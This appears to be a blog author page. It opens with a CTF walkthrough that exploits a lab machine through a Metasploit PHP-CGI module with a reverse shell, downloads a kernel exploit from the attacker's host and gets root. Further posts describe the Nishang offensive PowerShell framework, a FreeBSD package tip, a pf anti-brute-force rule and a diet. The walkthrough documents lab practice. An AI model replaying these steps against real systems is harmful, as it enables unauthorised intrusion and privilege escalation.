All posts by jbower

Double Kill – Hacker’s Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.

First target: 10.200.0.4

Nmap scan:
==========

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH is relatively up to date and so is Apache so time to see what Nikto finds.

Nikto scan:
===========

—————————————————————————
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
—————————————————————————

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:
=================

Dirb finds nothing of real interest.

http://10.200.0.4/cgi-bin/



Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it.  Great!

Exploitation:
=============

https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

0.4_2

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting  Required  Description
—-         —————  ——–  ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id  Name
—  —-
0   Automatic

msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’

First flag:
===========

[email protected]:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:
===================

3.2.0-23-generic
x86_64 x86_64 x86_64

http://www.exploit-db.com/exploits/33589/

[email protected]:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
–2014-07-26 23:42:11–  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’

100%[======================================>] 3,845       –.-K/s   in 0s

2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]

[email protected]:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
[email protected]:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
[email protected]:/tmp/infinity# whoami
whoami
root
[email protected]:/tmp/infinity# cd /root
cd /root
[email protected]:~# ls
ls
superuser-trophy.txt

Second flag:
===========

[email protected]:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01

[email protected]:~#

Creative Structure is Key by Haruki Murakami

There is a quote I read today by Haruki Murakami that really made me sit back and think about how I handle all my daily task and projects.  Especially with my obsession lately for absolute peak performance in my life.


“When I’m in writing mode for a novel, I get up at four a.m. and work for five or six hours.  In the afternoon, I run for ten kilometers or swim for fifteen-hundred meters (or do both), then I read a bit and listen to some music.  I go to bed at nine p.m.  I keep to this routine every day without variation.  The repetition itself becomes the important thing; it’s a form of mesmerism.  I mesmerize myself to read a deeper state of mind.  But to hold to such a repetition for so long-six months to a year-requires a good amount of mental and physical strength.  In that sense, writing a long novel is like survival training.  Physical strength is as necessary as artistic sensitivity.”

Own Windows with PowerShell using Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of Windows PowerShell for offensive security and post exploitation during Penetraion Tests.  The scripts are written on the basis of requirement by the author during real Penetration Tests.

PAYLOADS
It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.

HELP
All payloads and scripts are Get-Help compatible. Use “Get-Help -full” on a PowerShell prompt to get full help details.

CHANGELOG for version 0.2.7
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
– Fixed a minor bug in DNS_TXT_Pwnage.
– All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
– Added Get-PassHashes payload.
– Added Download-Execute-PS payload.
– The keylogger logs only fresh keys after exfiltring the keys 30 times.
– A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.

FreeBSD pkg_add little trick

So don’t ask me why but I decided to run FreeBSD 6.0 on an older Dell Latitude laptop. Install goes fine. But now I’ve got an issue. When trying to install a package I get the troublesome ftp error (cannot find this location dummy). But this was quickly resolved with the following.

You can also see which ftp directory your FreeBSD system is currently using by reading the error received when you try to install a bogus package:

# pkg_add -r test
Error: FTP Unable to get ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-release/Latest/abc.tbz: File unavailable (e.g., file not found, no access)
pkg_add: unable to fetch ‘ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-release/Latest/abc.tbz’ by URL

In this case, the system is using packages-6-release/Latest which contains the 6.9 version of xorg instead of packages-6-stable which contains the latest or 7.2 version of xorg. Take a peek in both directories on the ftp site, you’ll see for yourself.

You can ask pkg_add to go to a different location by modifying the PACKAGESITE environmental variable by typing this as one line:

# setenv PACKAGESITE ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-stable/Latest/

And Eureka! No more install issues.

Stopping FTP Brute Force Attacks in FreeBSD and OpenBSD

This is a great little article that I came across talking about stopping FTP brute force attacks in OpenBSD or FreeBSD (both of my favorite OS’s). It assumes that your using PF as your firewall (which you should!).

You can easily stop bruteforce attacks by limiting connections per IP using pf
firewall under FreeBSD or OpenBSD.

Open /etc/pf.conf

# vi /etc/pf.conf

Update it as follows:

# the lists of known FTPD attackers
table persist file “/etc/pf.ftp.block.list”

# block all incoming connections from attackers on FTPD
block in quick on $ext_if from

# Let us allow FTP with bruteforce protection
pass in quick on $ext_if inet proto tcp from any to ($ext_if) port 21 keep state (max-src-conn-rate 5/40, overload flush global)

Above will block FTP connections more than 5 times in 40 seconds. Also append the following line to /etc/rc.shutdown to keep changes after the reboot:

# echo '/sbin/pfctl -t ftp-attacks -T show > /etc/pf.ftp.block.list' >> /etc/rc.shutdown

Finally, reload pf firewall:

# /etc/rc.d/pf reload

To list currently blocked IP (attackers IP), enter:

# pfctl -t ftp-attacks -T show

WORKOUT

So I’ve been getting up @ 5am to workout and I must say that I’m pretty psyched about it. Well not the getting up at 5 part. But I’m pretty happy that I’ve been consistently going to the gym lately. My six-pack is just a few short months away from finally arriving!! I’m working on my diet as well which if doesn’t kill me will hopefully make me ripped. Here it is essentially, Daniel and I call the AC Slater diet.

After morning workout – Protein Shake
11am – Protein Shake
Noon – Tuna sandwich, banana
3pm – Protein Shake or cheese
5pm – Apple
7pm – Protein Shake

All Day Long – 1 gallon of water.